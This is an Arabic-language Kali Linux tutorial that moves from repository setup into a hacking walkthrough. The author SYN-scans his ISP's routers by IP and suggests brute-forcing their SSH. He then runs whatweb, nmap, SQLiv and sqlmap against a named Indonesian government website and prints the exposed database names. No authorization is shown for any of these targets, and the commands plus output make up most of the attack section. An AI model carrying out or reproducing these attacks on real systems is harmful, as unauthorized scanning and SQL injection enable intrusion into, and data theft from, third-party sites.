دروس كالي لينكس

Kali Linux Tutorial



إذا كنت خبيرًا أو على الأقل على دراية بنظام Linux والأوامر والبيئة ، فما عليك سوى تثبيت Kali Linux على جهازك ، وأردت أن تصبح خبيرًا في Kali Linux أو Ethical Hacker ، فأنت في المكان الصحيح. في هذه المقالة ، سأغطي برنامجًا تعليميًا لـ Kali Linux لمستخدمي Linux الذين ليسوا على دراية بـ Kali بالفعل وسأجعلك تبدأ في بعض التقنيات الأساسية المستخدمة في اختبار القرصنة والأمان أثناء استخدام Kali.

ما هو كالي لينكس؟

كالي لينكس ، ( صدر لأول مرة في 13 مارس 2013 ) التي كانت تُعرف رسميًا باسم BackTrack ، التي طورتها شركة الحماية Offensive Security ، هي توزيعة تتعلق بالطب الشرعي وتركز على الأمان استنادًا إلى فرع Debian's Testing. تم تصميم Kali Linux مع وضع اختبار الاختراق واستعادة البيانات واكتشاف التهديدات في الاعتبار. تحول المشروع إلى نموذج إصدار متجدد في وقت سابق من هذا العام في محاولة لتوفير المزيد من أدوات الأمان الحديثة لمستخدمي التوزيع. Kali Linux مجاني وسيظل كذلك دائمًا. لديها 600+ أدوات اختبار الاختراق المضمنة.







لماذا Kali Linux؟ هل هو صحيح بالنسبة لك؟

اكتسب Kali Linux الكثير من الشعبية مؤخرًا. وهناك سبب وراء ذلك. عاد القرصنة كأمر رائع في الثقافة الشعبية ويمكن أن يعزى ذلك بشكل كبير إلى المسلسل التلفزيوني السيد روبوت. ساعدت شعبية السيد Robot Kali Linux في الحصول على مستخدمين جدد. يحاول الأشخاص الذين بالكاد لديهم أي معرفة بنظام Linux أو أي شيء متعلق بأمان الكمبيوتر استخدام Kali كتوزيع Linux الرئيسي.



توزيع اختبارات الاختراق الأكثر تقدمًا لدينا على الإطلاق. - مطورو كالي لينكس. (إنه مكتوب على الصفحة الرئيسية لموقع Kali.org في أعلى الصفحة.) ما الذي تحصل عليه من هذا البيان؟ هل لاحظت هذا: APTD (توزيع اختبار الاختراق المتقدم)؟ لا يوجد مصطلح القرصنة هنا حرفيا. Kali Linux هو نفس توزيعات Linux الأخرى. ببساطة ، إنها توزيعة Linux مليئة بالأدوات المتعلقة بالأمان وتستهدف خبراء أمان الشبكات وأجهزة الكمبيوتر. ومع ذلك ، فإن استخدام Kali Linux يركز فقط على الأمان والطب الشرعي.



توزيع Linux ليس أكثر من حزمة تحتوي على Linux kernel ومجموعة من الأدوات المساعدة والتطبيقات الأساسية وبعض الإعدادات الافتراضية. لذلك ، لا يقدم Kali Linux شيئًا فريدًا بهذا المعنى ، حيث يمكن تثبيت معظم الأدوات المتوفرة على أي توزيعة Linux.





تم تصميم Kali Linux خصيصًا لتلبية متطلبات اختبار الاختراق المحترف والتدقيق الأمني. إنه يستهدف مجموعة فرعية معينة من مستخدمي Linux. Pentesters ، المتسللين ، وما إلى ذلك ، إنه ليس توزيعًا موصى به إذا كنت تتوقع Kali لسطح مكتب Linux للأغراض العامة للتطوير ، وتصميم الويب ، والألعاب ، والمكتب ، وما إلى ذلك ، قد يمنحك Kali بعض التحديات ، حتى لو كنت من مستخدمي Linux ذوي الخبرة .

أشياء يجب القيام بها بعد تثبيت KALI LINUX

بعد تثبيت Kali Linux ، قد تتساءل عما يجب فعله بعد ذلك ، أليس كذلك؟. الجميع يواجه هذه المشكلة ، لا تقلق.



الخطوة 1: قم بإعداد المستودع

أولاً ، قد تعرف هذا بالفعل ، ولكن من الأهمية بمكان ضبط المستودع بشكل صحيح. كما قلت ، نموذج الإصدار المتداول من Kali Linux في محاولة لتوفير المزيد من أدوات الأمان الحديثة لمستخدمي التوزيع. بشكل عام ، إذا كان لديك Kali Linux مثبتًا حديثًا ، فإن المستودع يشير إلى الوسائط التي تستخدمها للتثبيت. لإصلاح ذلك ، تحتاج إلى تغيير المستودع إلى مستودع Kali Linux الرسمي. الملف المطلوب موجود أسفل /etc/apt/sources.list . افتح الملف باستخدام محرر نصوص لوح الأوراق واستبدل المستودع الافتراضي بمستودع Kali Rolling الرسمي هذا:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

الخطوة الثانية: تحديث KALI LINUX الخاص بك وترقيته

بعد هذا التحديث والترقية لنظامك ، قم بمزامنة Kali Linux إلى أحدث إصدار. للقيام بذلك ، افتح الجهاز ، واكتب:

apt update -y && apt upgrade -y && apt dist-upgrade 

يقوم الأمر apt update بتنزيل وجلب الحزمة يسرد المعلومات من المستودعات ويقوم بتحديثها للحصول على معلومات حول أحدث إصدارات الحزم وتبعياتها.

يقوم الأمر apt Upgrade بتنزيل وتثبيت إصدار أحدث من حزم حزم Kali Linux المثبتة طالما أنها لا تحتوي على أخطاء في التبعيات.

ستقوم apt dist-Upgrade بتحديث جميع الحزم إلى أحدث إصدار متاح بغض النظر عن أي شيء. وأيضًا تثبيت وإزالة التبعيات حسب الحاجة (تثبيت التبعيات لتلبية الحزم ، من الواضح ، ولكن أيضًا إزالة التبعيات التي أصبحت معزولة إذا لم تعد الحزمة التي تم تحديثها بحاجة إلى التبعية.

مفهوم اختبار الاختراق الأساسي مع KALI LINUX

بعد الانتهاء من هذه الخطوات بنجاح ، هناك ثلاثة أشياء رئيسية يمكنك القيام بها باستخدام Kali Linux استنادًا إلى النظام المستهدف بما في ذلك:

  1. قرصنة الشبكة اللاسلكية - اختراق شبكات Wifi ، والتصوير الاحتيالي ، وتسمم ARP ، وما إلى ذلك.
  2. قرصنة تطبيقات الويب - حقن SQL ، تزوير طلب عبر المواقع (CSRF) ، ويب Phising ، إلخ.
  3. قرصنة الجهاز - استغلال الجهاز المستهدف للسيطرة عليه.

أنا لا أدرج قرصنة إنترنت الأشياء ، فهذا لا يعني أن Kali Linux ليس لديها القدرة على هذا الغرض. ولكن ، حرفيًا ، يمكن أن تنتمي إلى قرصنة الأجهزة أيضًا. حيث أن الجهاز له المظهر والشكل المادي. في هذا البرنامج التعليمي غطيت المعرفة الأساسية لهم. نظرًا لأن Kali Linux ضخم ، فإنه لا يتناسب مع مقال واحد!

تحتاج أيضًا إلى معرفة دورة أو إجراء اختبار الاختراق. هم انهم:

  1. الاستطلاع - جمع المعلومات
  2. يتم المسح
  3. عملية
  4. ما بعد الاستغلال

قرصنة شبكة لاسلكية مع KALI LINUX

فيما يتعلق باختراق الشبكة اللاسلكية ، قد تختلف الضحية. لأن الشبكات اللاسلكية تتكون من عدة أشياء ، مثل ISP (مزود خدمة الإنترنت) ، وجهاز التوجيه ورفاقه (المودم ، والمحور ، والمحول ، إلخ) والعملاء (المستخدمون ، CCTV ، الكمبيوتر البعيد ، إلخ). لديهم أيضا احتمالات ضعيفة.

الإنترنت عبارة عن مجموعة كبيرة ومعقدة من أجهزة الشبكة ، متصلة ببعضها البعض بواسطة بوابات. يعد تتبع المسار الذي تتبعه الحزم أمرًا مهمًا لمعرفة كيفية وصولك إلى اسم مضيف معين أو عنوان IP مستهدف.

يحتوي Kali Linux على أداة مضمنة تسمى Traceroute. يستخدم Traceroute وقت بروتوكول IP للعيش في المجال ويحاول الحصول على استجابة ICMP TIME_EXCEEDED من كل بوابة على طول المسار إلى بعض المضيفين. يحاول Traceroute تتبع المسار الذي ستتبعه حزمة IP لبعض مضيف الإنترنت عن طريق إطلاق حزم التحقيق مع TTL صغير (وقت العيش) ثم الاستماع لوقت ICMP الذي تجاوز الرد من البوابة. سأعطيك مثالاً عن كيفية تتبع موجه ISP المستخدم للتعامل مع اتصالنا باستخدام Traceroute.

1. الاعتراف

يعد جمع المعلومات أهم بداية سريعة ، فلا تفوّت هذه الخطوة. في هذه الخطوة ، هدفنا هو الحصول على أكبر قدر ممكن من المعلومات المفيدة التي يمكن أن نحصل عليها ، ثم يتم استخدام هذه المعلومات لمزيد من الخطوات.

أولاً ، افتح Terminal واكتب هذا الأمر لبدء تتبع الطريق إلى الموقع ، وفي هذه الحالة قمت بتعيين الموقع على google.com.

traceroute google.com 

لقطة شاشة Traceroute

2. المسح

بمجرد أن نقوم بتشغيل الأوامر ، فسوف يسرد أين تذهب الحزمة الخاصة بنا بالتسلسل. كما ترى أعلاه ، حصلت على 3 قفزات ، أحدها هو خادم ISP الخاص بي. عنوان IP الأول في القائمة هو جهاز التوجيه الخاص بي ، والذي يعمل كبوابة. والاثنان التاليان ينتميان إلى مزود خدمة الإنترنت الخاص بي. دعنا الآن نتحقق من الخدمة التي يشغّلونها باستخدام Nmap. لذا ، فإن الأهداف التي سنقوم بمسحها هي 10.152.192.1 و 10.13.223.102 . قمت بتشغيل الأمر التالي في المحطة:

nmap -v -sS [IP Target] -Pn 

دعونا نكسر حجة الأمر:

-v = تفعيل وضع الإسهاب

-sS = استخدام تقنية مسح TCP SYN

-Pn = معاملة جميع المضيفين على أنهم متصلون بالإنترنت - تخطي اكتشاف المضيف

وهذه هي النتيجة التي حصلنا عليها.

لقطة شاشة nmap 2

للأسف ، جميع المنافذ قيد التشغيل 10.152.192.1 يتم تصفيتها ، فهذا يعني أن جميع اتصالات TCP الواردة محظورة بواسطة IDS أو جدار الحماية على عنوان IP هذا. الآن ، دعنا نأخذ مسحًا آخر إلى الهدف الثاني.

شاشة nmap 1

3. العملية

في هذا الإجراء ، لا أنوي القيام بالاستغلال الحقيقي ، وبدلاً من ذلك أوضح لك كيف. بناءً على نتيجة فحص Nmap أعلاه ، نعلم أن IP هذا به خادم SSH يعمل على المنفذ 22 ، وهو مفتوح. إنه مفتوح للقسوة ، هاها! وجدنا الثقب ، خادم SSH هذا هو الثقب المحتمل الذي يمكننا محاولة الوصول إليه. هناك العديد من الأدوات في Kali Linux التي تدعم bruteforce أو هجمات القاموس ضد بروتوكول SSH. الأكثر شعبية وقوة هي Hydra.

حسنًا ، كان هذا إجراءًا أساسيًا لإجراء اختبار اختراق ضد خادم مستهدف ، وهو في مثالنا هنا خادم ISP الخاص بي.

قرصنة تطبيقات الويب باستخدام KALI LINUX

في الواقع ، إذا كنت شغوفًا بهذا الأمر ، فيمكنك إعداد بيئة القرصنة الخاصة بك عن طريق تثبيت DWVA (تطبيق الويب الضعيف) في Kali Linux. إنه تطبيق ويب PHP / MySQL يحتوي على مجموعة من الثغرات الضعيفة. تتمثل أهدافها الرئيسية في أن تكون مساعدة لمحترفي الأمن لاختبار مهاراتهم وأدواتهم في بيئة قانونية ، ومساعدة مطوري الويب على فهم عمليات تأمين تطبيقات الويب بشكل أفضل. يمكنك الحصول على DWVA مجانًا على Github هنا: https://github.com/ethicalhack3r/DVWA.

في الوقت الحالي ، سأوضح لك كيفية القيام بقرصنة تطبيقات الويب على موقع حقيقي. لكن ، أعدني أنه يقتصر على الغرض التعليمي فقط. سنقوم بمحاكاة هجوم حقيقي على موقع حقيقي باستخدام حقن SQL.

المتطلبات المسبقة

الأدوات المغطاة:

- Whatweb (مثبت مسبقًا)

- Nmap (مثبت مسبقًا)

- SQLiv (تثبيت يدويًا)

- SQLMap (مثبت مسبقًا)

نحتاج إلى أداة إضافية أخرى متوفرة على Github هنا: https://github.com/Hadesy2k/sqliv ، قم بتثبيتها أولاً على Kali Linux. هذه الأداة تسمى SQLiv وهي قادرة على إجراء مسح مستهدف من خلال توفير مجال معين (مع الزحف). اكتب في المحطة:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

الهدف: www.trenggalekkab.go.id

1. الاعتراف

جمع أكبر قدر ممكن من المعلومات المفيدة. يمكننا فتح صفحة الويب واكتشاف التطبيق الذي يعمل على هذا الموقع. أولاً ، دعنا نتحقق من نوع موقع الويب. سنستخدم whatweb للقيام بذلك.

whatweb www.trenggalekkab.go.id 

ما لقطة ويب

كما ترى النتيجة أعلاه ، يقع الهدف في إندونيسيا. إنها قيد التشغيل اباتشي v2.2.27 على خادم الويب الخاص به ولديها أيضًا PHP v5.4.31 ، له عنوان IP 103.247.21.142 . حسنًا ، لاحظ ذلك. قد تحتاج إلى زيارة صفحة الويب الخاصة به ، والبحث عن الملف أو الصفحة التي تم إنشاؤها ، أو معلمات URL ، أو حتى نموذج تسجيل الدخول. في الوقت الحالي ، نحتاج إلى عنوان IP هذا للخطوة التالية وهي الفحص.

2. المسح

كما هو الحال من قبل ، نستخدم Nmap مرة أخرى لفحص المنافذ والخدمات التي تعمل على الهدف.

nmap -v -sS 103.247.21.142 

وها هي النتيجة التي حصلنا عليها:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

هناك مجموعة من المنافذ المفتوحة التي تتعامل مع كل خدمة على الهدف ، ولكن المنفذ الذي يبدو ملفتًا للنظر هو خدمة mysql على المنفذ 3306. يشار إلى أن هذا الموقع يستخدم mysql لإدارة معلوماتهم في قواعد البيانات. بعد ذلك ، أتساءل عما إذا كانت هناك أي ثغرات أمنية في حقن SQL على هذا الموقع. لذلك ، قمت بفحص الموقع مرة أخرى باستخدام SQLiv الذي قمنا بتثبيته للتو. لقد كتبت الأمر:

sqliv -t www.trenggalekkab.go.id 

SQLHacking لقطة شاشة 1

وجدنا 2 من عناوين URL المعرضة للهجوم من SQL على هذا الموقع. قم بتدوين عناوين URL هذه.

3. العملية

حسنًا ، لدينا عناوين URL ضعيفة ، وجاهزة للتنفيذ. للقيام بذلك سوف نستخدم SQLMap. الصيغة هي:

sqlmap [Vulnerable URL] --dbs 

يجب أن يبدو الأمر كما يلي:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

الوسيطة –dbs هي إخبار SQLMap بالحصول على قواعد البيانات الهدف. هذا هو الناتج الذي حصلنا عليه:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

عثر SQLMap على قاعدتي بيانات ، ولكن واحدة منهما تحتوي على بيانات حساسة ، مثل حساب اعتماد المسؤول. هذا هو على trengkab_trg. بعد أن وجدنا قواعد البيانات ، لا تزال هناك خطوة أخرى يجب علينا القيام بها. هذا هو العثور على الجداول والأعمدة والخطوة الأخيرة هي تفريغ البيانات. لن أريكم كيف هنا في هذا القسم ، باستخدام هذا الهدف. على الأقل أنت تعرف الفكرة الأساسية حول دورة الهجوم ، واستخدام بعض الأدوات.

قرصنة الأجهزة

في مقال مستقبلي على هذا الموقع ، سنغطي قرصنة الجهاز ، ترقبوا ذلك. كتحذير مسبق ، سترغب في التأكد من أنك تعرف بعض لغة Python لهذا الغرض.